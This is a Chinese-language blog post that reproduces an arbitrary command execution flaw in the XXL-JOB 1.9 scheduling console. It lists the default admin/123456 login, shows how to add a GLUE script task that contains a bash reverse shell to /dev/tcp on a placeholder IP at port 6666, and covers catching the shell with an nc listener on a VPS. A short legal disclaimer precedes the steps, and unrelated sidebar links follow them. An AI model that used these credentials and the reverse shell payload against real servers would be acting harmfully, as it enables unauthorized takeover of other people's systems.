当前位置:网站首页>复现XXL-JOB 任务调度中心后台任意命令执行漏洞
复现XXL-JOB 任务调度中心后台任意命令执行漏洞
2022-07-30 04:30:00 【xiaochuhe.】
警告
请勿使用本文提到的内容违反法律。
本文不提供任何担保
目录
一、漏洞描述
XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限。
二、影响版本
- xxl-job 1.9版本系统
三、漏洞复现
1.默认口令admin/123456,登录后台增加一个任务


2.点击 GLUE IDE编辑脚本,输入下列命令:
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/6666 <&1'


3.vps nc开始进行开启监听:

4.点击进行执行,反弹shell


边栏推荐
- cnpm installation steps
- Unity3D Application模拟进入前后台及暂停
- 获取本机IP和Request的IP
- Atomic Guarantees of Redis Distributed Locks
- [The Mystery of Cloud Native] Cloud Native Background && Definition && Detailed explanation of related technologies?
- Android Studio 实现登录注册-源代码 (连接MySql数据库)
- 图像视角矫正之透视变换矩阵(单应矩阵)/findHomography 与 getPerspectiveTransformd的区别
- 海外多家权威媒体热议波场TRON:为互联网去中心化奠定基础
- How does MySql find out the latest data row that meets the conditions?
- Become a qualified cybersecurity, do you know this?
猜你喜欢

MYSQL unique constraint

High Concurrency Framework Disruptor

海外多家权威媒体热议波场TRON:为互联网去中心化奠定基础

handler+message【消息机制】
Go 学习笔记(84)— Go 项目目录结构

The underlying mechanism of the function

Charles replaces the interface response information

【软件工程之美 - 专栏笔记】31 | 软件测试要为产品质量负责吗?

Discourse Custom Header Links
![[Redis Master Cultivation Road] Jedis - the basic use of Jedis](/img/e3/0c6efd03432a01f857796f0bf648ef.png)
[Redis Master Cultivation Road] Jedis - the basic use of Jedis
随机推荐
High Concurrency Framework Disruptor
KubeMeet 报名 | 「边缘原生」线上技术沙龙完整议程公布!
MYSQL unique constraint
共建共享数字世界的根:阿里云打造全面的云原生开源生态
Arrays and Structures
PyG builds R-GCN to realize node classification
cnpm installation steps
宇宙的尽头是银行?聊聊在银行做软件测试的那些事
【 notes 】 the beauty of the software engineering - column 31 | software testing are responsible for the quality of products?
- B + tree index and MySQL series 】 【 what is the difference between a HASH index
BGP的简单实验
PyG搭建R-GCN实现节点分类
1. 获取数据-requests.get()
My first experience of Go+ language——Blessing message system, so that she can also feel your blessings
Eureka Registry
Charles replaces the interface response information
(题目练习)条件概率+权值线段树+FWT+后缀数组
成为一个合格的网安,你知道这些吗?
MySQL String Concatenation - Various String Concatenation Practical Cases
sqlmap use tutorial Daquan command Daquan (graphics)